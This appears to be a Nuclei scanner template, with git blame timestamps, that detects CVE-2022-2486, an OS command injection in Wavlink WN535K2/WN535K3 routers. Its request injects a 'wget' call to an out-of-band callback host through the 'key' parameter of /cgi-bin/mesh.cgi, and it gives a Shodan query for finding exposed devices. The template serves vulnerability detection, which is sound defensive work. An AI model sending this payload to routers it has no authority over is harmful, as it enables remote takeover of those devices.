nuclei-templates/http/cves/2022/CVE-2022-2486.yaml

44 lines
1.4 KiB
YAML
Raw Normal View History

2022-07-20 18:14:49 +00:00
id: CVE-2022-2486
info:
name: Wavlink WN535K2/WN535K3 - OS Command Injection
2022-07-20 18:14:49 +00:00
author: For3stCo1d
severity: critical
2022-07-20 18:34:27 +00:00
description: |
Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2022-07-20 18:14:49 +00:00
reference:
- https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
- https://vuldb.com/?id.204537
- https://nvd.nist.gov/vuln/detail/CVE-2022-2486
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-2486
cwe-id: CWE-78
epss-score: 0.97304
2022-07-20 18:14:49 +00:00
metadata:
max-request: 1
2022-07-20 18:14:49 +00:00
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
2022-07-21 08:14:08 +00:00
tags: cve,cve2022,iot,wavlink,router,rce,oast
2022-07-20 18:14:49 +00:00
http:
2022-07-20 18:14:49 +00:00
- raw:
- |
2022-09-18 07:23:27 +00:00
GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1
2022-07-20 18:14:49 +00:00
Host: {{Hostname}}
2022-09-18 07:31:43 +00:00
2022-07-21 08:14:08 +00:00
matchers-condition: and
2022-07-20 18:14:49 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
2022-07-21 08:14:08 +00:00
- type: status
status:
- 500
# Enhanced by md on 2022/10/06